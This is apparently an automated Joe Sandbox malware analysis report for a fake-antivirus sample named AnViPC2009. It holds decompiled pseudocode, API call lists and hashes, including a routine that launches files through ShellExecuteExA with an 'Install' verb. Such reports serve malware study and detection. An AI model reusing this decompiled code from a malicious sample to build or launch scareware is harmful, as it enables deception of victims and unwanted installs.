                                                                                                                                                      0x00403a91
                                                                                                                                                      0x00403a98
                                                                                                                                                      0x00403a9f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403aa1
                                                                                                                                                      0x00403aac
                                                                                                                                                      0x00403aae
                                                                                                                                                      0x00403aba
                                                                                                                                                      0x00403abf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403abf
                                                                                                                                                      0x00403a9f
                                                                                                                                                      0x00403a7a
                                                                                                                                                      0x00403a6b
                                                                                                                                                      0x00403a6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403a6e
                                                                                                                                                      0x00403a23
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403a3a
                                                                                                                                                      0x00403a4d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403a4d
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char
                                                                                                                                                      • String ID: E$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA
                                                                                                                                                      • API String ID: 751630497-346517416
                                                                                                                                                      • Opcode ID: 8cb7388664107b7cc6029eb6e34bce1cec4cf77fa07ba7c5c11d85c5f09dc011
                                                                                                                                                      • Instruction ID: 31783cc8de0c73cb0cc9da6340988402d3ab0ea6621f7e6004e8fcb766bb391b
                                                                                                                                                      • Opcode Fuzzy Hash: 8cb7388664107b7cc6029eb6e34bce1cec4cf77fa07ba7c5c11d85c5f09dc011
                                                                                                                                                      • Instruction Fuzzy Hash: 9E8237B0904685ADDF25DF70C844BEB7BA8AF41309F0441BBEA99761C2C77C6B84CB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AD1F(char _a4, long _a8) {
                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                      				char _v43;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				signed int _v60;
                                                                                                                                                      				int _v64;
                                                                                                                                                      				void* _v68;
                                                                                                                                                      				intOrPtr _t48;
                                                                                                                                                      				struct HWND__* _t49;
                                                                                                                                                      
                                                                                                                                                      				_t49 = GetDlgItem( *0x419f80, 0x67);
                                                                                                                                                      				_v8 = _t49;
                                                                                                                                                      				if( *0x41a814 == 0) {
                                                                                                                                                      					_t48 =  *0x418ecc; // 0x0
                                                                                                                                                      					E0040645E(_t48);
                                                                                                                                                      					ShowWindow(_t49, 5); // executed
                                                                                                                                                      					SendMessageA(_t49, 0xb1, 0, 0xffffffff);
                                                                                                                                                      					SendMessageA(_t49, 0xc2, 0, 0x4125aa);
                                                                                                                                                      					 *0x41a814 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                      				_v68 = 0x3c;
                                                                                                                                                      				SendMessageA(_v8, 0x43a, 0,  &_v68);
                                                                                                                                                      				_v43 = 0;
                                                                                                                                                      				_v64 = 1;
                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                      					_v60 = _v60 & 0xbfffffff | 1;
                                                                                                                                                      					_v48 = 0xa0;
                                                                                                                                                      					_v64 = 0x40000001;
                                                                                                                                                      				}
                                                                                                                                                      				SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                      				SendMessageA(_v8, 0xc2, 0, _a8);
                                                                                                                                                      				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                      					_v60 = _v60 & 0xfffffffe | 0x40000000;
                                                                                                                                                      					SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                      				}
                                                                                                                                                      				return SendMessageA(_v8, 0xc2, 0, "\r\n");
                                                                                                                                                      			}











                                                                                                                                                      0x0040ad43
                                                                                                                                                      0x0040ad45
                                                                                                                                                      0x0040ad4d
                                                                                                                                                      0x0040ad4f
                                                                                                                                                      0x0040ad55
                                                                                                                                                      0x0040ad5d
                                                                                                                                                      0x0040ad69
                                                                                                                                                      0x0040ad78
                                                                                                                                                      0x0040ad7a
                                                                                                                                                      0x0040ad7a
                                                                                                                                                      0x0040ad8c
                                                                                                                                                      0x0040ad9c
                                                                                                                                                      0x0040ada3
                                                                                                                                                      0x0040adac
                                                                                                                                                      0x0040adb0
                                                                                                                                                      0x0040adb3
                                                                                                                                                      0x0040adc0
                                                                                                                                                      0x0040adc3
                                                                                                                                                      0x0040adca
                                                                                                                                                      0x0040adca
                                                                                                                                                      0x0040adde
                                                                                                                                                      0x0040aded
                                                                                                                                                      0x0040adf5
                                                                                                                                                      0x0040adfb
                                                                                                                                                      0x0040ae08
                                                                                                                                                      0x0040ae19
                                                                                                                                                      0x0040ae19
                                                                                                                                                      0x0040ae30

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040AD30
                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE68), ref: 0040AD5D
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AD69
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AD78
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AD8C
                                                                                                                                                      • SendMessageA.USER32 ref: 0040ADA3
                                                                                                                                                      • SendMessageA.USER32 ref: 0040ADDE
                                                                                                                                                      • SendMessageA.USER32 ref: 0040ADED
                                                                                                                                                      • SendMessageA.USER32 ref: 0040ADF5
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE19
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE2A
                                                                                                                                                        • Part of subcall function 0040645E: DestroyWindow.USER32(?,7490B980,0040AD5A), ref: 00406469
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window$DestroyItemShow
                                                                                                                                                      • String ID: <
                                                                                                                                                      • API String ID: 2996232536-4251816714
                                                                                                                                                      • Opcode ID: 4cd09c08f60114875b86b86bde568e417490804e04dbe5cc682871dcf93f9856
                                                                                                                                                      • Instruction ID: e8e95ed800ab3f44f49925a5d61679fad07d67b3d58fa812c9eb088bb9a80cfc
                                                                                                                                                      • Opcode Fuzzy Hash: 4cd09c08f60114875b86b86bde568e417490804e04dbe5cc682871dcf93f9856
                                                                                                                                                      • Instruction Fuzzy Hash: E4319F71E40218BAEB119BA0DC4AFEE7E79EB41714F108129F601BA1E0C7B51E20DB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 774 411677-4116bf LoadLibraryA * 2 #17 LoadLibraryA 775 4116c1-4116cf GetProcAddress 774->775 776 4116de-4116ee SHGetMalloc 774->776 777 4116d1-4116d4 775->777 778 4116d7-4116d8 FreeLibrary 775->778 777->778 778->776
                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                      			E00411677(signed int* __ecx) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				struct HINSTANCE__* _t7;
                                                                                                                                                      				_Unknown_base(*)()* _t11;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      				struct HINSTANCE__* _t18;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				struct HINSTANCE__** _t21;
                                                                                                                                                      
                                                                                                                                                      				_t21 = __ecx;
                                                                                                                                                      				__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                      				 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                      				_t7 = LoadLibraryA("riched32.dll"); // executed
                                                                                                                                                      				 *_t21 = _t7;
                                                                                                                                                      				_t21[1] = LoadLibraryA("riched20.dll");
                                                                                                                                                      				__imp__#17(_t16, _t20, __ecx, __ecx);
                                                                                                                                                      				_v12 = 8;
                                                                                                                                                      				_v8 = 0x7ff;
                                                                                                                                                      				_t18 = LoadLibraryA("COMCTL32.DLL");
                                                                                                                                                      				if(_t18 != 0) {
                                                                                                                                                      					_t11 = GetProcAddress(_t18, "InitCommonControlsEx");
                                                                                                                                                      					if(_t11 != 0) {
                                                                                                                                                      						 *_t11( &_v12);
                                                                                                                                                      					}
                                                                                                                                                      					FreeLibrary(_t18);
                                                                                                                                                      				}
                                                                                                                                                      				__imp__SHGetMalloc(0x41fff0); // executed
                                                                                                                                                      				return _t21;
                                                                                                                                                      			}











                                                                                                                                                      0x00411684
                                                                                                                                                      0x00411686
                                                                                                                                                      0x0041168a
                                                                                                                                                      0x00411692
                                                                                                                                                      0x00411699
                                                                                                                                                      0x0041169d
                                                                                                                                                      0x004116a0
                                                                                                                                                      0x004116ab
                                                                                                                                                      0x004116b2
                                                                                                                                                      0x004116bb
                                                                                                                                                      0x004116bf
                                                                                                                                                      0x004116c7
                                                                                                                                                      0x004116cf
                                                                                                                                                      0x004116d5
                                                                                                                                                      0x004116d5
                                                                                                                                                      0x004116d8
                                                                                                                                                      0x004116d8
                                                                                                                                                      0x004116e3
                                                                                                                                                      0x004116ee

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(riched32.dll,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,?,?,?,0040D47E), ref: 00411692
                                                                                                                                                      • LoadLibraryA.KERNEL32(riched20.dll,?,0040D47E), ref: 0041169B
                                                                                                                                                      • #17.COMCTL32(?,0040D47E), ref: 004116A0
                                                                                                                                                      • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,0040D47E), ref: 004116B9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004116C7
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,0040D47E), ref: 004116D8
                                                                                                                                                      • SHGetMalloc.SHELL32(0041FFF0), ref: 004116E3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressFreeMallocProc
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$COMCTL32.DLL$InitCommonControlsEx$riched20.dll$riched32.dll
                                                                                                                                                      • API String ID: 253899923-2262293282
                                                                                                                                                      • Opcode ID: d381e30bf539c4c6666b99e59a21923ea705f1a00c5b232db6d3ab69148d256d
                                                                                                                                                      • Instruction ID: 2fdee5a4d2cde908a7e0198c494462a25550f93c786c886906295ffe04c9ed6d
                                                                                                                                                      • Opcode Fuzzy Hash: d381e30bf539c4c6666b99e59a21923ea705f1a00c5b232db6d3ab69148d256d
                                                                                                                                                      • Instruction Fuzzy Hash: B0F0A971510304BBD7106BA5DE09BEEBAE8DF81711F25852EE541D3150DBFCD490CB68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 779 40bd59-40bd70 call 40a35d 782 40bd76-40bd97 call 40a262 779->782 783 40bf6d-40bf6f 779->783 786 40bda1 782->786 787 40bd99-40bd9f 782->787 788 40bda4-40bda8 786->788 787->788 789 40bde9-40bdec 788->789 790 40bdaa 788->790 791 40bdfd-40be11 call 407669 789->791 792 40bdee-40bdf4 789->792 793 40bdac-40bdaf 790->793 805 40be13-40be20 call 40a573 791->805 806 40be29-40be37 call 40572e 791->806 792->791 794 40bdf6 792->794 796 40bdb1 793->796 797 40bdc5-40bdc9 793->797 794->791 801 40bdb9-40bdbd 796->801 798 40bdcb-40bdd0 797->798 799 40bddc-40bde1 797->799 798->799 802 40bdd2-40bdd8 798->802 803 40bde3 799->803 804 40bde5-40bde6 799->804 807 40bdb3-40bdb7 801->807 808 40bdbf 801->808 802->793 810 40bdda 802->810 803->804 804->789 805->806 817 40be22 805->817 815 40be51-40be54 806->815 816 40be39-40be4e call 4057e4 806->816 807->801 811 40bdc1 807->811 808->797 810->789 811->797 819 40be90-40bea3 ShellExecuteExA 815->819 820 40be56-40be59 815->820 816->815 817->806 821 40bec2-40bed1 819->821 822 40bea5-40bebc ShellExecuteExA 819->822 820->819 824 40be5b-40be8a call 40a450 call 40a5bb call 40572e 820->824 826 40bed3-40bed6 821->826 827 40bed8-40bedf 821->827 822->821 825 40bf6b-40bf6c 822->825 824->819 824->825 825->783 826->827 829 40bf0f-40bf1b CloseHandle 826->829 830 40bee1-40beea IsWindowVisible 827->830 831 40bef9-40bf0a WaitForInputIdle call 40b6c3 827->831 835 40bf1d-40bf2c call 40a573 829->835 836 40bf2e-40bf34 829->836 830->831 833 40beec-40bef5 ShowWindow 830->833 831->829 833->831 835->836 846 40bf5c-40bf5f 835->846 840 40bf42-40bf55 836->840 841 40bf36-40bf39 836->841 842 40bf56 Sleep 840->842 841->840 845 40bf3b-40bf40 841->845 842->846 845->842 846->825 848 40bf61-40bf69 ShowWindow 846->848 848->825
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BD59(char* __eax, void* __ecx, long _a4) {
                                                                                                                                                      				char _v5;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct _SHELLEXECUTEINFOA _v72;
                                                                                                                                                      				char _v1096;
                                                                                                                                                      				char _v2120;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				intOrPtr _t60;
                                                                                                                                                      				char _t61;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				struct HWND__* _t65;
                                                                                                                                                      				long _t68;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				char* _t86;
                                                                                                                                                      				long _t87;
                                                                                                                                                      				char _t93;
                                                                                                                                                      				char* _t94;
                                                                                                                                                      				long _t96;
                                                                                                                                                      				char* _t99;
                                                                                                                                                      				intOrPtr _t121;
                                                                                                                                                      				intOrPtr _t127;
                                                                                                                                                      
                                                                                                                                                      				_t99 = __eax;
                                                                                                                                                      				_t56 = E0040A35D(__ecx, __eax);
                                                                                                                                                      				if(_t56 >= 0x3f6) {
                                                                                                                                                      					return _t56;
                                                                                                                                                      				}
                                                                                                                                                      				_t96 = 0x3c;
                                                                                                                                                      				E0040A262(__ecx,  &_v72, 0, _t96);
                                                                                                                                                      				_t93 =  *_t99;
                                                                                                                                                      				_v72.cbSize = _t96;
                                                                                                                                                      				_v72.fMask = 0x5c0;
                                                                                                                                                      				if(_t93 != 0x22) {
                                                                                                                                                      					_v72.lpFile = _t99;
                                                                                                                                                      				} else {
                                                                                                                                                      					_v72.lpFile = _t99 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				_t59 = 0;
                                                                                                                                                      				if(_t93 == 0) {
                                                                                                                                                      					L19:
                                                                                                                                                      					if(_a4 == 0 &&  *0x41a392 != 0) {
                                                                                                                                                      						_v72.lpParameters = 0x41a392;
                                                                                                                                                      					}
                                                                                                                                                      					_v72.nShow = 1;
                                                                                                                                                      					_t60 = E00407669(_v72.lpFile);
                                                                                                                                                      					_v12 = _t60;
                                                                                                                                                      					if(_t60 != 0) {
                                                                                                                                                      						_t85 = E0040A573(_t60, ".inf");
                                                                                                                                                      						_t112 = _t85;
                                                                                                                                                      						if(_t85 == 0) {
                                                                                                                                                      							_v72.lpVerb = "Install";
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t61 = E0040572E(_t112, _v72.lpFile, 0);
                                                                                                                                                      					_v5 = _t61;
                                                                                                                                                      					if(_t61 != 0) {
                                                                                                                                                      						E004057E4(_v72.lpFile,  &_v2120);
                                                                                                                                                      						_v72.lpFile =  &_v2120;
                                                                                                                                                      					}
                                                                                                                                                      					if(_a4 == 0) {
                                                                                                                                                      						L30:
                                                                                                                                                      						_t63 = ShellExecuteExA( &_v72); // executed
                                                                                                                                                      						if((_t63 & 0xffffff00 | _t63 != 0x00000000) != 0) {
                                                                                                                                                      							L32:
                                                                                                                                                      							_v5 = 0;
                                                                                                                                                      							_t121 =  *0x419f88; // 0x0
                                                                                                                                                      							if(_t121 != 0 || _a4 != 0) {
                                                                                                                                                      								_t65 =  *0x419f80; // 0x0
                                                                                                                                                      								if(_t65 != 0 && IsWindowVisible(_t65) != 0) {
                                                                                                                                                      									ShowWindow( *0x419f80, 0);
                                                                                                                                                      									_v5 = 1;
                                                                                                                                                      								}
                                                                                                                                                      								WaitForInputIdle(_v72.hProcess, 0x7d0);
                                                                                                                                                      								E0040B6C3(_v72.hProcess);
                                                                                                                                                      							}
                                                                                                                                                      							_t68 = CloseHandle(_v72.hProcess);
                                                                                                                                                      							if(_v12 == 0) {
                                                                                                                                                      								L40:
                                                                                                                                                      								_t127 =  *0x419f88; // 0x0
                                                                                                                                                      								if(_t127 == 0 || _a4 != 0) {
                                                                                                                                                      									__eflags = _a4;
                                                                                                                                                      									_t68 = ((0 | _a4 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
                                                                                                                                                      									__eflags = _t68;
                                                                                                                                                      									Sleep(_t68);
                                                                                                                                                      								} else {
                                                                                                                                                      									Sleep(0x1b58);
                                                                                                                                                      								}
                                                                                                                                                      								goto L45;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t68 = E0040A573(_v12, ".exe");
                                                                                                                                                      								if(_t68 == 0) {
                                                                                                                                                      									L45:
                                                                                                                                                      									if(_v5 != 0) {
                                                                                                                                                      										_t68 = ShowWindow( *0x419f80, 1);
                                                                                                                                                      									}
                                                                                                                                                      									goto L47;
                                                                                                                                                      								}
                                                                                                                                                      								goto L40;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_v72.fMask = _v72.fMask & 0xfffffbff;
                                                                                                                                                      						_v72.lpFile = _t99;
                                                                                                                                                      						_t68 = ShellExecuteExA( &_v72) & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                      							goto L47;
                                                                                                                                                      						}
                                                                                                                                                      						goto L32;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t115 = _v5;
                                                                                                                                                      						if(_v5 != 0) {
                                                                                                                                                      							goto L30;
                                                                                                                                                      						}
                                                                                                                                                      						E0040A450( &_v1096, _v72.lpFile);
                                                                                                                                                      						E0040A5BB( &_v1096, ".exe");
                                                                                                                                                      						_t68 = E0040572E(_t115,  &_v1096, 0);
                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                      							L47:
                                                                                                                                                      							return _t68;
                                                                                                                                                      						}
                                                                                                                                                      						goto L30;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t94 = _t99;
                                                                                                                                                      					do {
                                                                                                                                                      						if( *_t94 != 0x22) {
                                                                                                                                                      							L12:
                                                                                                                                                      							if( *((char*)(_t59 + _t99)) == 0x20 ||  *((char*)(_t59 + _t99 + 1)) == 0x2f) {
                                                                                                                                                      								_t86 = _t59 + _t99;
                                                                                                                                                      								__eflags =  *_t86 - 0x20;
                                                                                                                                                      								if( *_t86 == 0x20) {
                                                                                                                                                      									 *_t86 = 0;
                                                                                                                                                      								}
                                                                                                                                                      								_t87 = _t86 + 1;
                                                                                                                                                      								__eflags = _t87;
                                                                                                                                                      								_v72.lpParameters = _t87;
                                                                                                                                                      								goto L19;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L14;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                      							if( *((intOrPtr*)(_t59 + _t99)) == 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *((char*)(_t59 + _t99)) - 0x22;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								 *((char*)(_t59 + _t99)) = 0x20;
                                                                                                                                                      								goto L12;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L12;
                                                                                                                                                      						L14:
                                                                                                                                                      						_t59 = _t59 + 1;
                                                                                                                                                      						_t94 = _t59 + _t99;
                                                                                                                                                      					} while ( *_t94 != 0);
                                                                                                                                                      					goto L19;
                                                                                                                                                      				}
                                                                                                                                                      			}
























                                                                                                                                                      0x0040bd63
                                                                                                                                                      0x0040bd66
                                                                                                                                                      0x0040bd70
                                                                                                                                                      0x0040bf6f
                                                                                                                                                      0x0040bf6f
                                                                                                                                                      0x0040bd7a
                                                                                                                                                      0x0040bd83
                                                                                                                                                      0x0040bd88
                                                                                                                                                      0x0040bd8a
                                                                                                                                                      0x0040bd8d
                                                                                                                                                      0x0040bd97
                                                                                                                                                      0x0040bda1
                                                                                                                                                      0x0040bd99
                                                                                                                                                      0x0040bd9c
                                                                                                                                                      0x0040bd9c
                                                                                                                                                      0x0040bda4
                                                                                                                                                      0x0040bda8
                                                                                                                                                      0x0040bde9
                                                                                                                                                      0x0040bdec
                                                                                                                                                      0x0040bdf6
                                                                                                                                                      0x0040bdf6
                                                                                                                                                      0x0040be00
                                                                                                                                                      0x0040be07
                                                                                                                                                      0x0040be0c
                                                                                                                                                      0x0040be11
                                                                                                                                                      0x0040be19
                                                                                                                                                      0x0040be1e
                                                                                                                                                      0x0040be20
                                                                                                                                                      0x0040be22
                                                                                                                                                      0x0040be22
                                                                                                                                                      0x0040be20
                                                                                                                                                      0x0040be2d
                                                                                                                                                      0x0040be32
                                                                                                                                                      0x0040be37
                                                                                                                                                      0x0040be43
                                                                                                                                                      0x0040be4e
                                                                                                                                                      0x0040be4e
                                                                                                                                                      0x0040be54
                                                                                                                                                      0x0040be90
                                                                                                                                                      0x0040be9a
                                                                                                                                                      0x0040bea3
                                                                                                                                                      0x0040bec2
                                                                                                                                                      0x0040bec8
                                                                                                                                                      0x0040becb
                                                                                                                                                      0x0040bed1
                                                                                                                                                      0x0040bed8
                                                                                                                                                      0x0040bedf
                                                                                                                                                      0x0040bef3
                                                                                                                                                      0x0040bef5
                                                                                                                                                      0x0040bef5
                                                                                                                                                      0x0040bf01
                                                                                                                                                      0x0040bf0a
                                                                                                                                                      0x0040bf0a
                                                                                                                                                      0x0040bf12
                                                                                                                                                      0x0040bf1b
                                                                                                                                                      0x0040bf2e
                                                                                                                                                      0x0040bf2e
                                                                                                                                                      0x0040bf34
                                                                                                                                                      0x0040bf44
                                                                                                                                                      0x0040bf50
                                                                                                                                                      0x0040bf50
                                                                                                                                                      0x0040bf56
                                                                                                                                                      0x0040bf3b
                                                                                                                                                      0x0040bf56
                                                                                                                                                      0x0040bf56
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf1d
                                                                                                                                                      0x0040bf25
                                                                                                                                                      0x0040bf2c
                                                                                                                                                      0x0040bf5c
                                                                                                                                                      0x0040bf5f
                                                                                                                                                      0x0040bf69
                                                                                                                                                      0x0040bf69
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf5f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf2c
                                                                                                                                                      0x0040bf1b
                                                                                                                                                      0x0040bea5
                                                                                                                                                      0x0040beb0
                                                                                                                                                      0x0040beb7
                                                                                                                                                      0x0040bebc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040be56
                                                                                                                                                      0x0040be56
                                                                                                                                                      0x0040be59
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040be65
                                                                                                                                                      0x0040be76
                                                                                                                                                      0x0040be83
                                                                                                                                                      0x0040be8a
                                                                                                                                                      0x0040bf6b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf6c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040be8a
                                                                                                                                                      0x0040bdaa
                                                                                                                                                      0x0040bdaa
                                                                                                                                                      0x0040bdac
                                                                                                                                                      0x0040bdaf
                                                                                                                                                      0x0040bdc5
                                                                                                                                                      0x0040bdc9
                                                                                                                                                      0x0040bddc
                                                                                                                                                      0x0040bdde
                                                                                                                                                      0x0040bde1
                                                                                                                                                      0x0040bde3
                                                                                                                                                      0x0040bde3
                                                                                                                                                      0x0040bde5
                                                                                                                                                      0x0040bde5
                                                                                                                                                      0x0040bde6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdc9
                                                                                                                                                      0x0040bdb9
                                                                                                                                                      0x0040bdb9
                                                                                                                                                      0x0040bdbd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdb3
                                                                                                                                                      0x0040bdb7
                                                                                                                                                      0x0040bdc1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdc1
                                                                                                                                                      0x0040bdb7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdd2
                                                                                                                                                      0x0040bdd2
                                                                                                                                                      0x0040bdd3
                                                                                                                                                      0x0040bdd6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdda

                                                                                                                                                      APIs
                                                                                                                                                      • ShellExecuteExA.SHELL32(?,?,00000000,?,?,00000000,0000003C), ref: 0040BE9A
                                                                                                                                                      • ShellExecuteExA.SHELL32(?), ref: 0040BEB3
                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 0040BEE2
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040BEF3
                                                                                                                                                      • WaitForInputIdle.USER32 ref: 0040BF01
                                                                                                                                                      • CloseHandle.KERNEL32(?,?), ref: 0040BF12
                                                                                                                                                      • Sleep.KERNEL32(-000003E9), ref: 0040BF56
                                                                                                                                                      • ShowWindow.USER32(00000001), ref: 0040BF69
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ExecuteShellShow$CloseHandleIdleInputSleepVisibleWait
                                                                                                                                                      • String ID: .exe$.inf$X&A
